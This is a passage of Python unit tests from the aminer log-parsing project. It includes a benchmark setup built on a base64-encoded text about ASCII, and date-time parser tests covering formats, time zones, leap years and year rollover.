b"NhdmUgYSBmaWxlIGFzICd0ZXh0IG9ubHknQVNDSUkgc3RhbmRzIGZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2RlIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoY" \ b"W5nZS4gQ29tcHV0ZXJzIGNhbiBvbmx5IHVuZGVyc3RhbmQgbnVtYmVycywgc28gYW4gQVNDSUkgY29kZSBpcyB0aGUgbnVtZXJpY2FsIHJlcHJlc2VudGF0" \ b"aW9uIG9mIGEgY2hhcmFjdGVyIHN1Y2ggYXMgJ2EnIG9yICdAJyBvciBhbiBhY3Rpb24gb2Ygc29tZSBzb3J0LiBBU0NJSSB3YXMgZGV2ZWxvcGVkIGEgbG9" \ b"uZyB0aW1lIGFnbyBhbmQgbm93IHRoZSBub24tcHJpbnRpbmcgY2hhcmFjdGVycyBhcmUgcmFyZWx5IHVzZWQgZm9yIHRoZWlyIG9yaWdpbmFsIHB1cnBvc2" \ b"UuIEJlbG93IGlzIHRoZSBBU0NJSSBjaGFyYWN0ZXIgdGFibGUgYW5kIHRoaXMgaW5jbHVkZXMgZGVzY3JpcHRpb25zIG9mIHRoZSBmaXJzdCAzMiBub24tc" \ b"HJpbnRpbmcgY2hhcmFjdGVycy4gQVNDSUkgd2FzIGFjdHVhbGx5IGRlc2lnbmVkIGZvciB1c2Ugd2l0aCB0ZWxldHlwZXMgYW5kIHNvIHRoZSBkZXNjcmlw" \ b"dGlvbnMgYXJlIHNvbWV3aGF0IG9ic2N1cmUuIElmIHNvbWVvbmUgc2F5cyB0aGV5IHdhbnQgeW91ciBDViBob3dldmVyIGluIEFTQ0lJIGZvcm1hdCwgYWx" \ b"sIHRoaXMgbWVhbnMgaXMgdGhleSB3YW50ICdwbGFpbicgdGV4dCB3aXRoIG5vIGZvcm1hdHRpbmcgc3VjaCBhcyB0YWJzLCBib2xkIG9yIHVuZGVyc2Nvcm" \ b"luZyAtIHRoZSByYXcgZm9ybWF0IHRoYXQgYW55IGNvbXB1dGVyIGNhbiB1bmRlcnN0YW5kLiBUaGlzIGlzIHVzdWFsbHkgc28gdGhleSBjYW4gZWFzaWx5I" \ b"GltcG9ydCB0aGUgZmlsZSBpbnRvIHRoZWlyIG93biBhcHBsaWNhdGlvbnMgd2l0aG91dCBpc3N1ZXMuIE5vdGVwYWQuZXhlIGNyZWF0ZXMgQVNDSUkgdGV4" \ b"dCwgb3IgaW4gTVMgV29yZCB5b3UgY2FuIHNhdmUgYSBmaWxlIGFzICd0ZXh0IG9ubHknQVNDSUkgc3RhbmRzIGZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2R" \ b"lIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoYW5nZS4gQ29tcHV0ZXJzIGNhbiBvbmx5IHVuZGVyc3RhbmQgbnVtYmVycywgc28gYW4gQVNDSUkgY29kZSBpcy" \ b"B0aGUgbnVtZXJpY2FsIHJlcHJlc2VudGF0aW9uIG9mIGEgY2hhcmFjdGVyIHN1Y2ggYXMgJ2EnIG9yICdAJyBvciBhbiBhY3Rpb24gb2Ygc29tZSBzb3J0L" \ b"iBBU0NJSSB3YXMgZGV2ZWxvcGVkIGEgbG9uZyB0aW1lIGFnbyBhbmQgbm93IHRoZSBub24tcHJpbnRpbmcgY2hhcmFjdGVycyBhcmUgcmFyZWx5IHVzZWQg" \ b"Zm9yIHRoZWlyIG9yaWdpbmFsIHB1cnBvc2UuIEJlbG93IGlzIHRoZSBBU0NJSSBjaGFyYWN0ZXIgdGFibGUgYW5kIHRoaXMgaW5jbHVkZXMgZGVzY3JpcHR" \ b"pb25zIG9mIHRoZSBmaXJzdCAzMiBub24tcHJpbnRpbmcgY2hhcmFjdGVycy4gQVNDSUkgd2FzIGFjdHVhbGx5IGRlc2lnbmVkIGZvciB1c2Ugd2l0aCB0ZW" \ 
b"xldHlwZXMgYW5kIHNvIHRoZSBkZXNjcmlwdGlvbnMgYXJlIHNvbWV3aGF0IG9ic2N1cmUuIElmIHNvbWVvbmUgc2F5cyB0aGV5IHdhbnQgeW91ciBDViBob" \ b"3dldmVyIGluIEFTQ0lJIGZvcm1hdCwgYWxsIHRoaXMgbWVhbnMgaXMgdGhleSB3YW50ICdwbGFpbicgdGV4dCB3aXRoIG5vIGZvcm1hdHRpbmcgc3VjaCBh" \ b"cyB0YWJzLCBib2xkIG9yIHVuZGVyc2NvcmluZyAtIHRoZSByYXcgZm9ybWF0IHRoYXQgYW55IGNvbXB1dGVyIGNhbiB1bmRlcnN0YW5kLiBUaGlzIGlzIHV" \ b"zdWFsbHkgc28gdGhleSBjYW4gZWFzaWx5IGltcG9ydCB0aGUgZmlsZSBpbnRvIHRoZWlyIG93biBhcHBsaWNhdGlvbnMgd2l0aG91dCBpc3N1ZXMuIE5vdG" \ b"VwYWQuZXhlIGNyZWF0ZXMgQVNDSUkgdGV4dCwgb3IgaW4gTVMgV29yZCB5b3UgY2FuIHNhdmUgYSBmaWxlIGFzICd0ZXh0IG9ubHknQVNDSUkgc3RhbmRzI" \ b"GZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2RlIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoYW5nZS4gQ29tcHV0ZXJzIGNhbiBvbmx5IHVuZGVyc3RhbmQgbnVt" \ b"YmVycywgc28gYW4gQVNDSUkgY29kZSBpcyB0aGUgbnVtZXJpY2FsIHJlcHJlc2VudGF0aW9uIG9mIGEgY2hhcmFjdGVyIHN1Y2ggYXMgJ2EnIG9yICdAJyB" \ b"vciBhbiBhY3Rpb24gb2Ygc29tZSBzb3J0LiBBU0NJSSB3YXMgZGV2ZWxvcGVkIGEgbG9uZyB0aW1lIGFnbyBhbmQgbm93IHRoZSBub24tcHJpbnRpbmcgY2" \ b"hhcmFjdGVycyBhcmUgcmFyZWx5IHVzZWQgZm9yIHRoZWlyIG9yaWdpbmFsIHB1cnBvc2UuIEJlbG93IGlzIHRoZSBBU0NJSSBjaGFyYWN0ZXIgdGFibGUgY" \ b"W5kIHRoaXMgaW5jbHVkZXMgZGVzY3JpcHRpb25zIG9mIHRoZSBmaXJzdCAzMiBub24tcHJpbnRpbmcgY2hhcmFjdGVycy4gQVNDSUkgd2FzIGFjdHVhbGx5" \ b"IGRlc2lnbmVkIGZvciB1c2Ugd2l0aCB0ZWxldHlwZXMgYW5kIHNvIHRoZSBkZXNjcmlwdGlvbnMgYXJlIHNvbWV3aGF0IG9ic2N1cmUuIElmIHNvbWVvbmU" \ b"gc2F5cyB0aGV5IHdhbnQgeW91ciBDViBob3dldmVyIGluIEFTQ0lJIGZvcm1hdCwgYWxsIHRoaXMgbWVhbnMgaXMgdGhleSB3YW50ICdwbGFpbicgdGV4dC" \ b"B3aXRoIG5vIGZvcm1hdHRpbmcgc3VjaCBhcyB0YWJzLCBib2xkIG9yIHVuZGVyc2NvcmluZyAtIHRoZSByYXcgZm9ybWF0IHRoYXQgYW55IGNvbXB1dGVyI" \ b"GNhbiB1bmRlcnN0YW5kLiBUaGlzIGlzIHVzdWFsbHkgc28gdGhleSBjYW4gZWFzaWx5IGltcG9ydCB0aGUgZmlsZSBpbnRvIHRoZWlyIG93biBhcHBsaWNh" \ b"dGlvbnMgd2l0aG91dCBpc3N1ZXMuIE5vdGVwYWQuZXhlIGNyZWF0ZXMgQVNDSUkgdGV4dCwgb3IgaW4gTVMgV29yZCB5b3UgY2FuIHNhdmUgYSBmaWxlIGF" \ b"zICd0ZXh0IG9ubHknQVNDSUkgc3RhbmRzIGZvciBBbWVyaWNhbiBTdGFuZGFyZCBDb2RlIGZvciBJbmZvcm1hdGlvbiBJbnRlcmNoYW5nZS4gQ29tcHV0ZX" \ 
b"JzIGNhbiBvbmx5IHVuZGVyc3RhbmQgbnVtYmVycywgc28gYW4gQVNDSUkgY29kZSBpcyB0aGUgbnVtZXJpY2FsIHJlcHJlc2VudGF0aW9uIG9mIGEgY2hhc" \ b"mFjdGVyIHN1Y2ggYXMgJ2EnIG9yICdAJyBvciBhbiBhY3Rpb24gb2Ygc29tZSBzb3J0LiBBU0NJSSB3YXMgZGV2ZWxvcGVkIGEgbG9uZyB0aW1lIGFnbyBh" \ b"bmQgbm93IHRoZSBub24tcHJpbnRpbmcgY2hhcmFjdGVycyBhcmUgcmFyZWx5IHVzZWQgZm9yIHRoZWlyIG9yaWdpbmFsIHB1cnBvc2UuIEJlbG93IGlzIHR" \ b"oZSBBU0NJSSBjaGFyYWN0ZXIgdGFibGUgYW5kIHRoaXMgaW5jbHVkZXMgZGVzY3JpcHRpb25zIG9mIHRoZSBmaXJzdCAzMiBub24tcHJpbg==" """ end_setup = """ dummy_match_context = DummyMatchContext(base64_string) dummy_match_context_list = [copy.deepcopy(dummy_match_context) for _ in range(times)] base64_dme = Base64StringModelElement("s0") def run(): match_context = dummy_match_context_list.pop(0) base64_dme.get_match_element("base64", match_context) """ _setup100 = import_setup + string100_setup + end_setup _setup4096 = import_setup + string4096_setup + end_setup # import timeit # times = 100000 # print("All text lengths are given from the original text. Base64 encoding needs 33% more characters." 
# " Every text length is run 100.000 times.") # t = timeit.timeit(setup=_setup100, stmt="run()", number=times) # print("Text length 100: ", t) # t = timeit.timeit(setup=_setup4096, stmt="run()", number=times) # print("Text length 4096: ", t) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/DateTimeModelElementTest.py000066400000000000000000001254411500476301700306330ustar00rootroot00000000000000import unittest import logging import pytz import locale from io import StringIO from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.MatchElement import MatchElement from aminer.parsing.MatchContext import MatchContext from unit.TestBase import TestBase, DummyMatchContext, initialize_loggers from datetime import datetime, timezone from pwd import getpwnam from grp import getgrnam class DateTimeModelElementTest(TestBase): """ Unittests for the DateTimeModelElement. To calculate the expected timestamps the timezone shift was added or subtracted from the date and the epoch was calculated on https://www.epochconverter.com/. For example the date 24.03.2018 11:40:00 CET was converted to 24.03.2018 10:40:00 UTC and then the epoch in seconds was calculated (1521888000). 
""" id_ = "dtme" path = "path" def test1get_match_element_with_different_date_formats(self): """Test if different date_formats can be used to match data.""" # test normal date data = b"07.02.2019 11:40:00: it still works" date = b"07.02.2019 11:40:00" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) # test leap year date data = b"29.02.2020 11:40:00: it still works" date = b"29.02.2020 11:40:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1582976400, None) # test normal date with T data = b"07.02.2019T11:40:00: it still works" date = b"07.02.2019T11:40:00" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%YT%H:%M:%S", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) # test normal date with fractions data = b"07.02.2019 11:40:00.123456: it still works" date = b"07.02.2019 11:40:00.123456" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S.%f", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600.123456, None) # test normal date with z data = b"07.02.2019 11:40:00+0000: it still works" date = b"07.02.2019 11:40:00+0000" match_context = DummyMatchContext(data) date_time_model_element = 
DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S%z", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) # test normal date with z data = b"07.02.2019 11:40:00 UTC: it still works" date = b"07.02.2019 11:40:00 UTC" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) # test normal date with z data = b"07.02.2019 11:40:00 GMT: it still works" date = b"07.02.2019 11:40:00 GMT" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) # test normal date with z data = b"07.02.2019 11:40:00 UTC+01: it still works" date = b"07.02.2019 11:40:00 UTC+01" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549536000, None) # wrong timezone identifiers for offsets data = b"07.02.2019 11:40:00 CET+01: it still works" date = b"07.02.2019 11:40:00 CET" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549536000, None) data = b"07.02.2019 11:40:00: it still works" date = b"07.02.2019 11:40:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549539600, None) # test with only date defined data = 
b"07.02.2019: it still works" date = b"07.02.2019" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1549497600, None) # test with only time defined. Here obviously the seconds can not be tested. data = b"11:40:23: it still works" date = b"11:40:23" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%H:%M:%S", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, match_element.match_object, None) self.assertEqual(match_element.match_string, b"11:40:23") self.assertEqual(match_context.match_string, b"11:40:23") # %s data = b"1662760597" date = b"1662760597" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%s", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1662760597, None) self.assertEqual(match_element.match_string, b"1662760597") self.assertEqual(match_context.match_string, b"1662760597") # %s with milliseconds data = b"1662760597123" date = b"1662760597123" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%s", timezone.utc, timestamp_scale=1000) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1662760597.123, None) self.assertEqual(match_element.match_string, b"1662760597123") self.assertEqual(match_context.match_string, b"1662760597123") # %s with microseconds data = 
b"1662760597123456" date = b"1662760597123456" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%s", timezone.utc, timestamp_scale=1e6) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1662760597.123456, None) self.assertEqual(match_element.match_string, b"1662760597123456") self.assertEqual(match_context.match_string, b"1662760597123456") def test2wrong_date(self): """Test if wrong input data does not return a match.""" # wrong day data = b"32.03.2019 11:40:00: it still works" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # wrong month data = b"01.13.2019 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # wrong year data = b"01.01.00 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # wrong date leap year data = b"29.02.2019 11:40:00: it still works" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # missing T data = b"07.02.2019 11:40:00: it still works" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%YT%H:%M:%S", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) 
self.compare_no_match_results(data, match_element, match_context) # missing fractions data = b"07.02.2019 11:40:00.: it still works" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S.%f", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3get_match_element_with_unclean_format_string(self): """This test case checks if unclean format_strings can be used.""" data = b"Date %d: 07.02.2018 11:40:00 UTC+0000: it still works" date = b"Date %d: 07.02.2018 11:40:00 UTC+0000" match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"Date %%d: %d.%m.%Y %H:%M:%S%z", timezone.utc) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518003600, None) def test4get_match_element_with_different_time_zones(self): """Test if different time_zones work with the DateTimeModelElement.""" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S%z", timezone.utc) data = b"07.02.2018 11:40:00 UTC-1200: it still works" date = b"07.02.2018 11:40:00 UTC-1200" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518046800, None) data = b"07.02.2018 11:40:00 GMT-1200: it still works" date = b"07.02.2018 11:40:00 GMT-1200" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518046800, None) data = b"07.02.2018 11:40:00 UTC-12: it still works" date = b"07.02.2018 11:40:00 UTC-12" match_context = 
DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518046800, None) data = b"07.02.2018 11:40:00 UTC-5: it still works" date = b"07.02.2018 11:40:00 UTC-5" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518021600, None) data = b"07.02.2018 11:40:00 UTC-0500: it still works" date = b"07.02.2018 11:40:00 UTC-0500" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518021600, None) data = b"07.02.2018 11:40:00-05:00: it still works" date = b"07.02.2018 11:40:00-05:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518021600, None) data = b"07.02.2018 11:40:00 UTC+0000: it still works" date = b"07.02.2018 11:40:00 UTC+0000" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518003600, None) data = b"07.02.2018 11:40:00 UTC+0100: it still works" date = b"07.02.2018 11:40:00 UTC+0100" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518000000, None) data = b"07.02.2018 11:40:00+01:00: it still works" date = b"07.02.2018 11:40:00+01:00" match_context = DummyMatchContext(data) match_element = 
date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1518000000, None) data = b"07.02.2018 11:40:00 UTC+1400: it still works" date = b"07.02.2018 11:40:00 UTC+1400" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1517953200, None) def test5get_match_element_with_different_text_locales(self): """Test if data with different text locales can be handled with different text_locale parameters.""" DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, "en_US.UTF-8") DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, "de_AT.UTF-8") DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, "de_AT.ISO-8859-1") def test6text_locale_not_installed(self): """Check if an exception is raised when the text_locale is not installed on the system.""" self.assertRaises(locale.Error, DateTimeModelElement, self.id_, b"%d.%m %H:%M:%S", timezone.utc, "af-ZA.UTF-8") def test7get_match_element_with_start_year(self): """Test if dates without year can be parsed, when the start_year is defined.""" data = b"07.02 11:40:00: it still works" date = b"07.02 11:40:00" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=2017) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1486467600, None) match_context = DummyMatchContext(data) date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=2019) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, 
self.path, date, 1549539600, None) def test8get_match_element_without_start_year_defined(self): """Test if dates without year can still be parsed, even without defining the start_year.""" data = b"07.02 11:40:00: it still works" date = b"07.02 11:40:00" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc) match_context = DummyMatchContext(data) dtm = datetime(datetime.now().year, 2, 7, 11, 40, tzinfo=timezone.utc) total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, total_seconds, None) def test9get_match_element_with_leap_start_year(self): """Check if leap start_years can parse the 29th February.""" data = b"29.02 11:40:00: it still works" date = b"29.02 11:40:00" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=2020) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1582976400, None) def test10get_match_element_without_leap_start_year(self): """Check if normal start_years can not parse the 29th February.""" data = b"29.02 11:40:00: it still works" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=2019) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test11learn_new_start_year_with_start_year_set(self): """Test if a new year is learned successfully with the start year being set.""" data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" start_year = 2020 date_time_model_element = DateTimeModelElement(self.id_, 
b"%d.%m %H:%M:%S", timezone.utc, start_year=start_year) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1609459140, None) self.assertEqual(date_time_model_element.start_year, start_year) data = b"01.01 11:20:00: it still works" date = b"01.01 11:20:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1609500000, None) self.assertEqual(date_time_model_element.start_year, start_year + 1) def test12learn_new_start_year_without_start_year_set(self): """Test if a new year is learned successfully with the start year being None.""" data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m %H:%M:%S", timezone.utc) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) dtm = datetime(datetime.now().year, 12, 31, 23, 59, tzinfo=timezone.utc) total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, total_seconds, None) data = b"01.01 11:20:00: it still works" date = b"01.01 11:20:00" start_year = date_time_model_element.start_year match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) dtm = datetime(datetime.now().year+1, 1, 1, 11, 20, tzinfo=timezone.utc) total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, total_seconds, None) self.assertEqual(date_time_model_element.start_year, start_year + 1) def 
test13max_time_jump_seconds_in_time(self): """ Test if the max_time_jump_seconds parameter works if the next date is in time. Warnings with unqualified timestamp year wraparound. """ log_stream = StringIO() logging.basicConfig(stream=log_stream, level=logging.INFO) max_time_jump_seconds = 86400 start_year = 2020 date_time_model_element = DateTimeModelElement( self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=start_year, max_time_jump_seconds=max_time_jump_seconds) data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1609459140, None) self.assertEqual(date_time_model_element.start_year, start_year) data = b"01.01 23:59:00: it still works" date = b"01.01 23:59:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1609545540, None) self.assertEqual(date_time_model_element.start_year, start_year + 1) self.assertIn("WARNING:DEBUG:DateTimeModelElement unqualified timestamp year wraparound detected from 2021-01-01T23:59:00+00:00 to " "2021-01-01T23:59:00+00:00", log_stream.getvalue()) for handler in logging.root.handlers[:]: logging.root.removeHandler(handler) initialize_loggers(self.aminer_config, getpwnam("aminer").pw_uid, getgrnam("aminer").gr_gid) def test14max_time_jump_seconds_exceeded(self): """ Test if the start_year is not updated, when the next date exceeds the max_time_jump_seconds. A time inconsistency warning must occur. 
""" log_stream = StringIO() logging.basicConfig(stream=log_stream, level=logging.INFO) max_time_jump_seconds = 86400 start_year = 2020 date_time_model_element = DateTimeModelElement( self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=start_year, max_time_jump_seconds=max_time_jump_seconds) data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1609459140, None) self.assertEqual(date_time_model_element.start_year, start_year) data = b"01.01 23:59:01: it still works" date = b"01.01 23:59:01" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1577923141, None) self.assertEqual(date_time_model_element.start_year, start_year) self.assertIn("WARNING:DEBUG:DateTimeModelElement time inconsistencies parsing b'01.01 23:59:01', expecting value around " "1609459140. Check your settings!", log_stream.getvalue()) date_time_model_element = DateTimeModelElement( self.id_, b"%d.%m %H:%M:%S", timezone.utc, start_year=start_year, max_time_jump_seconds=max_time_jump_seconds) data = b"05.03 06:29:07: it still works" date = b"05.03 06:29:07" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1583389747, None) self.assertEqual(date_time_model_element.start_year, start_year) self.assertIn("WARNING:DEBUG:DateTimeModelElement time inconsistencies parsing b'01.01 23:59:01', expecting value around " "1609459140. 
Check your settings!", log_stream.getvalue()) data = b"29.02 07:24:02: it still works" date = b"29.02 07:24:02" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1582961042, None) self.assertEqual(date_time_model_element.start_year, start_year) for handler in logging.root.handlers[:]: logging.root.removeHandler(handler) initialize_loggers(self.aminer_config, getpwnam("aminer").pw_uid, getgrnam("aminer").gr_gid) def test15time_change_cest_cet(self): """Check if the time change from CET to CEST and vice versa work as expected.""" data = b"24.03.2018 11:40:00 CET: it still works" date = b"24.03.2018 11:40:00 CET" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S%z", timezone.utc) match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1521888000, None) # make sure format changes with longer format specifiers also work data = b"25.03.2018 11:40:00 CEST: it still works" date = b"25.03.2018 11:40:00 CEST" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1521970800, None) data = b"27.10.2018 11:40:00 CEST: it still works" date = b"27.10.2018 11:40:00 CEST" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1540633200, None) data = b"28.10.2018 11:40:00 CET: it still works" date = b"28.10.2018 11:40:00 CET" match_context = DummyMatchContext(data) match_element = 
date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1540723200, None) data = b"27.10.2018 11:40:00 EST: it still works" date = b"27.10.2018 11:40:00 EST" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1540658400, None) data = b"27.10.2018 11:40:00 PDT: it still works" date = b"27.10.2018 11:40:00 PDT" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1540665600, None) data = b"27.10.2018 11:40:00 GMT: it still works" date = b"27.10.2018 11:40:00 GMT" match_context = DummyMatchContext(data) match_element = date_time_model_element.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, date, 1540640400, None) def test16same_timestamp_multiple_times(self): """Test if the DateTimeModelElement can handle multiple same timestamps.""" data = b"07.02.2019 11:40:00: it still works" date = b"07.02.2019 11:40:00" date_time_model_element = DateTimeModelElement(self.id_, b"%d.%m.%Y %H:%M:%S", timezone.utc) match_context = DummyMatchContext(data) match_element = 